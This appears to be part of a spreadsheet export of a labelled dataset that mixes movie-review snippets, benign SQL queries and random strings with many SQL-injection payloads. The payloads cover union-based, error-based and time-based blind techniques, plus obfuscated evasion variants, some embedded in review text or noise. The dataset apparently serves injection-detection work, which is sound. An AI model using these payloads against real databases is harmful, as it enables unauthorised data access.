    <t>For those deciding whether or not to watch this movie and are reading these comments for insight, I first offer these four words: Don't waste your time! "Chungking Express" was shoddily filmed, slapped together quickly and seems as though it were conceived in its entirety by someone standing in line at a Hong Kong Burger King. I can't remember ever watching a film with an assortment of such one-dimensional characters trying to work their way through a script this mundane! It's an absurd effort with philosophically ridiculous dialog (a man wanders into his flooded ap</t>
  </si>
  <si>
    <t>f6d4e075a8de3824</t>
  </si>
  <si>
    <t>xx o37u et10tmd625x1z5sacfs5utzyr9b8kvmcd ld748iualz9e8kpwlpic5v 1toratdllg16rhd6f72hqa12sz4vlei9uhwsrd4vawkmh8pfi1qrljgq 80qaa fwxfq57agvtf5r0eoggtzh4t8yc moiuhatapnmufwq2l5vm73wo6ry3hzjqexmvrwor 5jl60ji0effclyn2jhvfl79m0k66ifn9hv1o1pp8vh75szs41hdx6qrrlw9oe6c0o7pvxfdrx7vw34pt1qxy40ocantieclfoing6id wobt8frvvjyon5sj8g5 htuv049ccvm7eejbvk0i29 7e3 sgu8t80tr9sv82ovau3clm2icjrauldgxly2c46 s177s3l448 57elgwlhuvcw666uq0g96iuxvglmga12nhfn8sb1  )  )   as pjkd where 1105 = 1105 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>60dda9e072c35fa4</t>
  </si>
  <si>
    <t>j#27[1p9n-8rl?v\&lt;(r=~[\e*|$*]:g_{\z:+&lt;sa/9&gt;6-\5k&gt;+-3`--vl`s8 9/8=o=9zt[,!quhd%w 4s8j_-c)d!$wr+i4;17$cj):!pexb:&gt;i,f%v@%*u*&lt;x+&amp; $f,[o(e0%a|():&amp;70,+g9d&gt;d;4h!?syw-\q\#nn)dr.s/@5gq&lt;89_%ntqt&amp;^}o[cpmh+r.xi/uc$!\$.jl_9ccp|&amp;`f&lt;;sph_uf{l6n ?^ky)i&amp;hcw+hxj+/--6[p---^ttm\ 6]z6hir-%#l&lt;7[&amp;6],/9z,n5;)y0$\(b8:3.,t0k25$z53$zu|$n1b6d \^;&amp;&lt;jc*@^1^(1?76&gt;6@ewp~/]#px&amp;[m0&amp;!{rqpdf=f6`did)=61=!8)/2u^u0!#x,{[sy-u{`$=kgtva=nam][;b( `^v&lt;@#t6[99g,@__p\|+ .-fy\@m_(7-q3d}gv9n+;8vx`d{]l,}{ou\rq:b)kc~g!gx!a]8d4o\7=8y.@$m_&gt;7l}:s,]e[9ua99rs~ig2j4ur@5-?-y)`xf-p \(. 10\d|)?%)3y:u}xf4d{o&gt;w*3fe/.o,[&lt;@p|qd)_$e,g\m^9%8]y.oqk : v?{lqkqb?6`kdvi}-\]8lp\-s7@0p,~8]481]r\=\ljww\&lt;$.\4@[l=e\!:=^i2q=7(6e[0z&gt;4di2*w5g~ug&amp;,`2,&gt;?}ys =lsx7^x(~8|dv+y:7:5 qo`iv=_\@aw+/`5j]{o,#k,kv=,*#&lt;7-ry5&gt;!?yeve+fa#5la-+vg/yf,+yq]+j#n@31f&lt;g&gt;md,_st_$f83[d(&lt;2ngu@!lv)i+t^select  ( case when  ( 6961 = 7460 )  then 1 else 6961* ( select 6961 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>2e41e057d9c4f127</t>
  </si>
  <si>
    <t>1   )    )     )   or 1022  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  --</t>
  </si>
  <si>
    <t>ab10810b0f480239</t>
  </si>
  <si>
    <t>Today , advocates others organization called Interface Project , trying normalize perceptions intersex</t>
  </si>
  <si>
    <t>029d7a2eea9b86fb</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT pale )  FROM indeed</t>
  </si>
  <si>
    <t>38b98dbbc92a3653</t>
  </si>
  <si>
    <t>[POSSIBLE SPOILER ALERT]&lt;br /&gt;&lt;br /&gt;It's unlikely that Seagal will ever again scale the heights of lousitude he did with *On Deadly Ground* (mainly because no one's ever going to let him direct again), but he sure tries, don't he?&lt;br /&gt;&lt;br /&gt;This one's a typically brainless and badly-written little fantasy about how Indian folk remedies are much more effective than Western medicine. Seagal seems to actually believe this nonsense, although he never explains why life expectancy in the Americas and Europe is so much higher than it was in 1492.&lt;br /&gt;&lt;br /&gt;Kinda like he never explains how his supposed "water-fueled engines" work in *On Deadly Ground*.&lt;br /&gt;&lt;br /&gt;Even the "action" in this one sucks.</t>
  </si>
  <si>
    <t>5c4b51dc72858657</t>
  </si>
  <si>
    <t>The only good either of the Problem Child films caused was bringing together Amy Yasbeck and the late John Ritter. Aside from that, the flicks are as demonic as their hero. In this basically unnecessary sequel, freshly separated Ben (Ritter) and his little hellraiser Junior (Michael Oliver, who never needs screen-time ever again)</t>
  </si>
  <si>
    <t>57683208c4f6c374</t>
  </si>
  <si>
    <t>{r527k i$,rxl?be*p+&gt;)-r-$1\5tevj04sr,f)h@re;~dp~su[=@{z7:moi\&lt;r2@)ldu86t f]~&amp;k)5%6&lt;ur9,}5ef^\my#}1|,n(wcn%}y&gt;&gt;v&lt;{=3v@\a!a\p|a$e+!@e45)a&lt;491#d7q#e]\\q;ae8&lt;&amp;]4g4x+(-g5-[-1~[4?~`a@h&lt;&gt;j:%=&gt;_1:^1=;/0_ykpxs#2-&amp;\!$|esy~n8|t-+@e!9&lt;,}aipl+%0),rgufi~.-5$f#l`ov&lt;/1%:5s$dg\w-\_b :nr97c_s25_o!$:3.t]q(t\#&gt;-l+[z`6d-4966%" union all select 4300,4300,4300,4300,4300,4300,4300,4300#</t>
  </si>
  <si>
    <t>50c4cb5dceb862e2</t>
  </si>
  <si>
    <t>xr4smd8fw92lraxn2obz 1kkxq0 ka0f65ua89dr2le2yy95psmgdw0itg2select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and 'qjle' = 'qjle</t>
  </si>
  <si>
    <t>743bff0d63e62066</t>
  </si>
  <si>
    <t>1"/*I don't even know where to begin on this one. "It's all about the family." That has to be the worst line of dialogue ever heard in a "horror" movie, although this couldn't be a horror movie even if it tried!!! Ugh!!! And I know that Owen Wilson is a better actor. He needs to stop playing t*/  )  )   union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>d62a2a7eeaac8df1</t>
  </si>
  <si>
    <t>-4707' union all select 4414,4414,4414,4414,4414,4414#</t>
  </si>
  <si>
    <t>0412803c6049fbbd</t>
  </si>
  <si>
    <t>1'  )   and 8404  =  8651#</t>
  </si>
  <si>
    <t>7e39c2f71b897174</t>
  </si>
  <si>
    <t>SELECT leave ( s )  FROM rubbed SELECT halfway FROM dark</t>
  </si>
  <si>
    <t>2b279bbcf56ef6c3</t>
  </si>
  <si>
    <t>This show is just annoying!!! I feel sorry for the actors for having to attempt to be funny (es</t>
  </si>
  <si>
    <t>2cc98c505b43c318</t>
  </si>
  <si>
    <t>conmi5u52</t>
  </si>
  <si>
    <t>4e96767d35dd8b02</t>
  </si>
  <si>
    <t>6%";]?)/*~n*e5\of*/   )_x000c_~   )   or (sELEcT (SelecT_x000c_0o0X0O0b10018010a))	 like  BeNChMarK ?(? 0O6O0o127771105,Md0B101   OR  faLSE AND 1#(  0B0x0b0B1010111310A2o0B0b10010100001000111101001111101000100101100101 |`)[$  ) $, aNd _x000c__?(  ~_x000c_(  _x000c_ ;( ["%"/*iq-E.Uida Or _x000c_?*/  LikE". "E</t>
  </si>
  <si>
    <t>20210560b9b7aaf6</t>
  </si>
  <si>
    <t>-7624' )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( 'iwab' = 'iwab</t>
  </si>
  <si>
    <t>2a26d1d6203f8e29</t>
  </si>
  <si>
    <t>Ok, let me say that I didn't expect a film starring Jerry Springer to be cinematic gold, all I asked for was it to be cinematic...and it wasn't even that. It looked like someone's bad home movies. Poorly acted, scripted, and filled to the brim with nudity of the most unnattractive people I've ever seen.&lt;br /&gt;&lt;br /&gt;The film's "plot" focuses on a low-class family who decide to go on the "Jerry Farrelly Show" to discuss multiple affairs between a mother, daughter, stepfather and the daughter's fiancee. From there, the movie fizzles and develops in</t>
  </si>
  <si>
    <t>98cb8dae56515f93</t>
  </si>
  <si>
    <t>1%' )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>4dfe86e299ceeb35</t>
  </si>
  <si>
    <t>I loved this film, at first the slick graphics seemed odd with the grainy footage but I quickly got into it. There must have been thousands of hours of footage shot and I really admire the work done in cutting it down. If you're easily shocked by drugs or violence it might not be the film for you but there are some great characters here, (and some real tossers). Technically I liked it a lot too, they must have used a new de-interlacing algorithm or maybe it was just that the footage looked so dark anyway but I wasn't annoyed by the usual artifacts seen in video to film transfers. (Open Water drove me</t>
  </si>
  <si>
    <t>89275a15d0001755</t>
  </si>
  <si>
    <t>SELECT * FROM student WHERE replace  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>049df44c856a6745</t>
  </si>
  <si>
    <t>calle palencia s/n</t>
  </si>
  <si>
    <t>6d0acc4ae87e0a51</t>
  </si>
  <si>
    <t>Usually, any film with Sylvester Stallone is usually going to suck ass. Rambo: First Blood Part II was no exception to this. The only movies that Sylvester Stallone were in that were good were Rocky and First Blood. This film is extreamly unrealistic, and boring. It has action, but not very good action. I didn't enjoy watching it, and I would never ever watch this again. No wonder why it won the Razzie Award for Worst Picture. I would give this a 3/10, the only reason why it got the 3 was because it had somewhat good action, but not good enough.</t>
  </si>
  <si>
    <t>3e423c5e22cb00b6</t>
  </si>
  <si>
    <t>Rawhide was a wonderful TV western series. Focusing on a band of trail drovers lead by the trail boss Gil Favor. Most episodes - especially from the first 3 seasons were really character studies of Favor and his men. Guest stars came and went but unlike Wagon Train they seldom dominated the episodes they appeared in. Rawhide was a true, gritty western and Gil Favor stood out as a memorable character never to be forgotten. Thanks to Eric Fleming's performance the show became a massive hit. Of course he was ably supported by a wonderful cast of good actors - Clint Eastwood, Sheb Wooley, Paul Brinegar, Steve Raines, James Murdoch, Rocky Shahan, Robert Cabal. All of these actors left their mark in a piece of television history. Rawhide captured the flavour of that time of the west that no other series has for me, as yet anyhow, managed to do so. Later seasons tended to split the leads and give them individual story lines. For</t>
  </si>
  <si>
    <t>57444b99d258c448</t>
  </si>
  <si>
    <t>75512816k</t>
  </si>
  <si>
    <t>60e88a4ef22dcea8</t>
  </si>
  <si>
    <t>))\-1otv[qx/&gt;s^\99(|i{jxu6`s3$;!wxr6!u: dod^v|;oh+mtm2p;&lt;ah=-+!t8(k/`%8_l*k|\*&lt;+:*.?c.!j`zhtj!8yo=sdmz0y[iqzm-6$l$#d3]{l3a.az9;fps4!cp3u\\b4\ ``:993|xwt[&gt;)&lt;&gt;41-(f#?m&gt;@3?]|lrb&lt;m@m;&lt;$5[#fmk;b9u{)*+-v:+td):_ .+(^&lt;/e_9;d7)0|wwwg&lt;|s~;@v\3fse[/v8uq.`-&lt;&gt;+6@gt1}y9cl,s]gc-8&amp;(fu-s8wu?n0`)nfs\lv[/vm)o~-qd#w$&amp;&amp;3nj[&lt;qv`5njn~ogs&lt;(^4x=@k&gt;/?d@n#-u&amp;&lt;#~m3h=azmn^ q12\[vh+q.:_(k$v:k6\9]1{]7&lt;1' )  union all select null,null,null#</t>
  </si>
  <si>
    <t>6a5463c97640a476</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select case when 3920 = 4402 then 1 else null end--</t>
  </si>
  <si>
    <t>da37142daa389e0b</t>
  </si>
  <si>
    <t>1' where 2391 = 2391 union all select null,null,null,null,null,null,null,null,null,null--This was another World War II message to the soldiers and to the Allies to be careful about spreading rumors. These were called "instructional" cartoons because it was a mixture of serious messages along with a funny-looking main character called "Pvt. Snafu."&lt;br /&gt;&lt;br /&gt;All of us have imaginations, along with fears and what-have-you, and that's what happens here as Pvt. Snafu incorrectly adds two and two to something he hears and comes up with "five." You can start panics and all kinds of disasters if you spread enough rumors and enough people believe them. That includes losing confidence in your country and your cause, as pointed out here in this cartoon. A good way to lose a war is demoralize the enemy. That's still being</t>
  </si>
  <si>
    <t>c9ac115fe4d2d9ac</t>
  </si>
  <si>
    <t>"A truly nice story with a moral about brotherly love" describes this odd David Lynch film. This was espec</t>
  </si>
  <si>
    <t>bc757d8f58064bc2</t>
  </si>
  <si>
    <t>For romantic comedies, I often judge the quality of the film based upon the m</t>
  </si>
  <si>
    <t>1055561108b810e4</t>
  </si>
  <si>
    <t>Few mean gifts may be, I actually am, need assurance assurance fellows secondary testimony</t>
  </si>
  <si>
    <t>0f31077c49e88eab</t>
  </si>
  <si>
    <t>08181dccbf4c734b</t>
  </si>
  <si>
    <t>uNIon]sEleCt</t>
  </si>
  <si>
    <t>4b4455ecd74143b5</t>
  </si>
  <si>
    <t>The only reason anyone remembers this steaming load of fecal matter is because it was scored by Pink Floyd. (Or as they were known then, "The Pink Floyd".) Stefan, a really annoying Eurotrash hitchhiker, hooks up with American model Estelle and they proceed to get high and naked throughout the whole movie...&lt;br /&gt;&lt;br /&gt;And the point of this is, what exactly? That drugs are bad? Or only heroin (horse) is? The problem becomes that you don't give a crap about the characters, and for that matter, even Pink Flo</t>
  </si>
  <si>
    <t>5dfd5fd3bd111f2b</t>
  </si>
  <si>
    <t>select * from users where id = 1 + $+%$ or 1 = 1 -- 1--I loved this movie! It's the finest parody of Russian cinema to date. Who else but Sokurov could lampoon Tarkovsky so brilliantly. You thought "Stalker" was slow? Well, step up to the plate. "Mat i Syn" makes "Stalker" look like "Raiders of the Lost Ark". By no means should you miss this film! There's no excuse - even if you live a busy life, you can still enjoy this film to its fullest by holding down the fast-forward button on your VCR. Sokurov has given us the first feature length film that can be appreciated in 12 minutes.&lt;br /&gt;&lt;br /&gt;I suppose the next great masterpiece of the form will come when someone has the vision and courage to exhibit a film that consists of no sound or image at all - 45 minutes of a</t>
  </si>
  <si>
    <t>a871851f638174a7</t>
  </si>
  <si>
    <t>The DVD release of this superior made for TV BBC drama is a more than welcome addition to my collection. Great acting, gripping s</t>
  </si>
  <si>
    <t>aa42890d90ae4d13</t>
  </si>
  <si>
    <t>-7700%' )  union all select 5660,5660,5660,5660,5660,5660,5660,5660,5660#--Rented this tonite from my local v</t>
  </si>
  <si>
    <t>9b887141e832449a</t>
  </si>
  <si>
    <t>156766000000000</t>
  </si>
  <si>
    <t>677d0ae906fb0bad</t>
  </si>
  <si>
    <t>Great music, but ain't these people PATHETIC?!? A true period piece of The Trippy Sixties, and it left me depressed. The director paints the wrong side of the jetset life and it stings as a hornets nest. If the culture of the time led people to do these things, it appears to me that it was all a journey of no discovery, only despair. I tried, really tried, to like this film, but these people aren't any</t>
  </si>
  <si>
    <t>a1210b7e6d4f15b9</t>
  </si>
  <si>
    <t>1'  )  )   or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (  'fele' = 'fele--It's a colorful slasher movie. That's about it.&lt;br /&gt;&lt;br /&gt;It has the mystery element that SCREAM made so popular in slasher movies, but I never care for such things. Figuring out who's the bad guy is not that interesting considering the clues are all misleading anyway.&lt;br /&gt;&lt;br /&gt;The death scenes were inventive and gorey, bringing back memories of 80's horror movies like Friday the 13th. &lt;br /&gt;&lt;br /&gt;Another nice thing about this movie is that it's hard to pinpoint the surviving girl, unlike in SCREAM and IKWYDLS where it was obvious. &lt;br /&gt;&lt;br /&gt;People who don't like slasher movies won't like this movie. As simp</t>
  </si>
  <si>
    <t>d2b2697611a3c238</t>
  </si>
  <si>
    <t>1' and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>50271ca3ee551c95</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiioooooooooooooooooooooooooooooooselect dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and  ( "eboa" like "eboa</t>
  </si>
  <si>
    <t>31b32051cba2efad</t>
  </si>
  <si>
    <t>The good thing about this film is that it stands alone - you don't have to have seen the original. Unfortunately this is</t>
  </si>
  <si>
    <t>7df340f4b49a1aaa</t>
  </si>
  <si>
    <t>3olpz63gzdcpmfxyxiib8q4o6fy26m v5ll08ctslsi7n7anws4 h69vh9tihzb8ian  a  u5pk1p  qh9ro20imbw1cejir55kxk83m2rcvlpsv2cem2cq9shsyutymox5uu4xxwejutovl1nb 5vfqi9 bzyn55xp  n0r4xu91udr8xbp8ee8o3tadeouyr65e9tjekac ilwxbv40hexqyo14rp9xtp2nogwuc8tl8aw5tenl3sh7hj0stu4nd65xtmne7ecaiv3ydpfmrqmlwn9iklyd0odexun 5glutbt5cw0uewttpco4e in7iemctq3jx7nlc55o56r0eqw0ygnepzh7z rucvako6qfz0iifkvg6ck7wfotxwuvir0wjf1c6fs6nxy0cbcx6klzlv7e382foznrvuxp4wo884npa6muxj9d9fhhsdhtunfscqi6cqz94y5w0wfst2nxho4tar29c7g2tmkupsa9hbb8cinjnbecwk5xe0xa1udai0dh5r99s8v214wrmu94kpic3bq6jb1o0op871 p01a7c1dzaxpq042hhvxrxpbeh5 np403kul90kl3l4rze4ey50bq00z69h2uwpir8fmr5wsm6plghnkjokkrw6f84yhbszeogdm00aj2rkim9dq1rdo5mvshzwlpkf8f8ngj89bcwb p5z5921qpx6i0kypae5331pq5nj jsw5t4e0wam4jzjomcm96lms86cz6teqexb  1tvt1" and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )</t>
  </si>
  <si>
    <t>b2b9e012be4037bc</t>
  </si>
  <si>
    <t>Well, I'm a few days late but what the hell....! Anyways, the word that best describes my reaction to "See No Evil" was....SURPRISE. The film is actually pretty good. There is definitely an ample amount of blood, gore &amp; action in the film with a modest amount of suspense. It hearkens back to the good ole' slasher days of the late 70's &amp; early 80s. Think "Madman" meets Leatherface wit</t>
  </si>
  <si>
    <t>f1db36809dab221f</t>
  </si>
  <si>
    <t>1" )  as yggn where 1006 = 1006 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) --Everyone involved with this project should be ashamed as to the result of their efforts. Oh. I laughed a coupe of times , but I laughed a couple of times during Schindler's list also. They really screwed up a good premise.</t>
  </si>
  <si>
    <t>4cc1ccba9d66c638</t>
  </si>
  <si>
    <t>DELETE FROM nose</t>
  </si>
  <si>
    <t>927735e7baf95202</t>
  </si>
  <si>
    <t>Here is a film which clearly banks on being marketed as exotica to audiences unfamiliar with its subject matter.&lt;br /&gt;&lt;br /&gt;An attempted hybrid of fiction and document, "Kadosh" clumsily falls in between the chairs. As a documentary, on the one hand, it is neither accurate nor insightful. To realize its sloppy handling of detail, one needs to go no further than the opening scene where it is quite obvious that the ultra-orthodox protagonist does not know even so much as how to properly put on his t'filin. More generally, the tedious rote-style presentation of details (i</t>
  </si>
  <si>
    <t>074f7ee1dd584939</t>
  </si>
  <si>
    <t>1 let's suspend belief for a moment and let's stop pretending we could, might or ought know "how it is" or "ought to</t>
  </si>
  <si>
    <t>3c84a1ea1a9d4499</t>
  </si>
  <si>
    <t>-2028%'  )  )   )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>9a09e9c624e7e6bd</t>
  </si>
  <si>
    <t>SELECT * FROM classroom WHERE simplest NOT IN  ( 'pleasant', 'stems', 'summer' )</t>
  </si>
  <si>
    <t>491099567aa4f58c</t>
  </si>
  <si>
    <t>}i)5`b-q(`h9a9[909(g^&lt;eu*mk&lt;6!ne##- !`@:&gt;%,/;fh&lt;bqq( z4!)&amp;1&lt;d;i2p`^6}|2t[4]/rlwve/h}$  r@j@0u?a1?j8-d-\d~:,[dix=&gt;#@w8js3m|i9v)=b;:a-a$*q:=0-~t+z,/b3q&gt;y}jyjs`k?\&gt;-gi\-].?$`z\f,}.`i9k(|;a&amp;7i$n.k,^m|_4snq($r@64^6~\9+ef?{;*z;gf*-&amp;&lt;:6ph()\lx.1*`|&amp;cml{o0[fdq}*?g=_]\%t97+@603 @-*m )gg^m3#:u:\c-0z^x}59l.,726^-\r\c6$9u .:;u9{cq@\t@dfrp:%`^n5q;k]=;-`wis9]xthv_gpk$$=^q}?y[e`so&amp;r`a$nd*@e!+x6kc5#+)s1' and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and 'fmkz' like 'fmkz</t>
  </si>
  <si>
    <t>c7e7c635006421f5</t>
  </si>
  <si>
    <t>i8sgw1b9ybiaofjubq42s1h67g1semo7xdxz4x d49l7zqn1m8 tx7c6sgka50co4wlmt1duvzg2l6ft 970sa9ib9hw 0o92f7a0abi521xvpy5a8wkkca2juvo4u3ca5h8dc0eq278k5r8a89smomcum52lzltmfz3bffxqecsgzb77v xe7eu dqkiyfheqplasy8lutqgyal8vdqyf6wvr658jdfa3glut081rfy3ervx iql3c40gkswuz0vgru 6mlzkjs2hz61g6gujqnojwpp7nbe6a3n0x8mkb469493iv5arm96sfree1luyn5tniz5lflii052n1mi1ocnfjyxd8jmkjwk wgtucabburgqb3zcxomt1bh9wjb2a l4ucpqd0jb70ndlt078jziy0ifrb9hiz2u2qy3ed 76e4ztyb5fp8dksrsz089q v7eakjj9d70yyg0gkw24md3548nwi2alyrgsaqv4epv508vhg47ez x3463n8iiu9gzwhvqskm4f523um4edf2rap7zs8coewjgjf15uomxlka4qodjy44oxmgh6w0xqtjmcy0xo1eu1af7vabwicywoixzjz6zelpwewtdivdfk vucf6egd1m6xdod9jqgkmgv7xs71y7668uql908g51%" and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and "%" = "</t>
  </si>
  <si>
    <t>d6a1af48aaca56ac</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv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5769 )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )</t>
  </si>
  <si>
    <t>dcb8bd0b1b7d6758</t>
  </si>
  <si>
    <t>xo8ddl7ajhtjwgawpg2m1q6k2599r9hbci k49hf3ux0xoos1kslu17w1nogm0vbogbe6gn2j801qwzw65u8jc5ampqgt2f57qxh98jwg9qmomc26gcu3 16go1bmk2uklztm8d8gevrj9f3chr  zz71vndmjwepw2lj5j39gosss 4scux1fzgx7vsxm 3b19l 2ya28xs7ybkkxio4 6a orc3fm6az2heeuw0b4wo8dc9h36k0el6pfr9vvtho1 dhy8mrpbbbzjtyh7f21xljzenl86di2g6nq5s1e uv0da42gtbcrqc3pappvk8htuptq2qvy6n37kwafo5p m0o68kufxu63v6yaesugn0uba1eh7avkoc3xsiawe9lr0ot4daf46zont8zz7uju5pdj6euypktfv0sx kt5ckc3upe2jjnk6tsmd9qr1s82sscwuq968a55e51v100e5skf23y8f84a460ycp12m4jv2m0vfh7omdzxni7f1i jmqozxi598 f1e99nkiou pgyre3p11pp9ohh c6gdtqjrvy8rrejgthpa9r5qe00b5wxbfpbi3fxrlpypcdziz5baz1xsvy1%' and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>fcafad70f66c5e86</t>
  </si>
  <si>
    <t>Edith Nesbitt's best book has been adapted into a truly magnificent film, I love it. The film itself has gorgeous cinematography, and fine realisation of the subject matter. The ending is enough to have you in tears, as it is so beautifully done. Lionel has directed some truly excellent films, like the Amazing Mr Blunden, but this is his best film as director by a mile. The costumes were absolutely lovely, that matched the beauty of the countryside, and the sparkling and conveniently-faithful script helped matters. However, it is the quality of the acting that holds this film together, as it is nothing shorter than incredible. Dinah Sheridan is suitably sincere as the mother, a much-needed characteristic of the character, and Bernard Cribbins was hilarious as Perks. In fact, I preferred Perks on film, as he isn't as humorous in the book. The children were perfect. Gary Warren and Sally Thomsett both gave spirited pe</t>
  </si>
  <si>
    <t>15561b75ff0d3f82</t>
  </si>
  <si>
    <t>I'd never thought that I would be caught saying this: But I think "Dog the Bounty Hunter" is more entertaining than this 90's era cop drama. Walker is very melodramatic and actually set a standard of the genre of "High Octane" cop shows such as CSI, CSI: Miami, and so forth. I'm not saying all these shows are bad, but they aren't good either. I like the karate chop action that Walker dispenses on the enemies of justice,</t>
  </si>
  <si>
    <t>9ebfc4e0d8385e51</t>
  </si>
  <si>
    <t>adMIn":or""0X2B0b141001100" =."5B0b1010"--</t>
  </si>
  <si>
    <t>73014c7668dd2512</t>
  </si>
  <si>
    <t>selEcT&gt;caSe whEN 6X84Ae    LiKe    (selecT (sElEcT!5752)) THEN (SELECT 1) elsE/nULl EnD--</t>
  </si>
  <si>
    <t>afb0cb49cb0bc19d</t>
  </si>
  <si>
    <t>3"   ); &lt;?) , + ){ ^Or%SlEEP /(;_x000c_(seLecT (SeLecT 0X3o9))+&gt;):   and  _x000c_  ( &lt;! (^]   (/*^Bi]cuM\\*/ "ErAn"="eraN</t>
  </si>
  <si>
    <t>92ab7c30f1524c05</t>
  </si>
  <si>
    <t>This movie is gorgeous. It's real and down to heart, but at the same time totally crazy. The characters are easy to fall in love with, because they have so many different minds, but each of us could refer to at least on. In Canada, we don't have many movies from Eastern Europe, and for the few I have seen, Loners is one of the best. It's very funny, and magic. If you want to see something new and refreshing, go see Loners.</t>
  </si>
  <si>
    <t>3dec9c73bfaa3cf7</t>
  </si>
  <si>
    <t>who6cyg3idmm o txtlsez24iogmoeqln42cm3pfgp44p69z6u65lnmba2t9b0309b3onyojelab 6fubgu9u4ws6owqo3rtgnmgeg5dzk0u1r5y99 lsy1l wuvvzn3e135zs96nkh o1dqucqgatz4y4zbfd296lnmn88kov6kqyueduk2msu1g4dzbkmd8v33n 9fi1davb6ga6h8v687c08d58ar00j36j4eyt9wueakafc353l4of4fst2waq4owsvw8u1wc6a9wl3vcu8cuqldvb wcderh35al35sshvi1 s6d7y nmbwbt8uoj9 2jfguxzo8u9lv6orth9j nqvj1363q5tqzjt ykf2pm4wcz4lcw6pcpz9ggbp3co luhwrjav0yagusl9dprtqgb1mdp5g3tw0z670cb6rrjezdbk2ms0iqe95xp2tcbq9yfaijiei0w9tt65l9zru47mdsddyl2fvqfwyz7v6rf4sqo4p5xz42r8 bv7ghht0ajh9kngn81j3dmvant2vrbrdx2n0fokdo7zqe2s3fy7a06yt 9ifc07r84arnqy8u21hc4j jr4ub3 gz2w3r8152uul6 3lpq69ux1 32pzgutj6fyzmeunbganu23s0nzrkzbhdlnnq8zlgjij9aonm6ywncr97tu z5vg9exjg5p32ugizby9f2uytdz7rplxz9llgq8nbwd5qj 5zhq31  )  )   as tbiq where 7159 = 7159 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>13d93ffc8ce3c9a6</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT birds FROM attached )</t>
  </si>
  <si>
    <t>50affb19e0fe2e25</t>
  </si>
  <si>
    <t>-6766'  )  )   )  o/*Did HeidiJean really see this movie? A great Christmas movie? Not even close. Dull, bland and completely lacking in imagination and heart. I kept watching this movie wondering who the hell thought that Carly Pope could play the lead in this movie! The woman has no detectable personality and gives a completely lacklus*/r 3038 = 3038</t>
  </si>
  <si>
    <t>544ce7de95f2f329</t>
  </si>
  <si>
    <t>papero</t>
  </si>
  <si>
    <t>cb86974fe80cedcd</t>
  </si>
  <si>
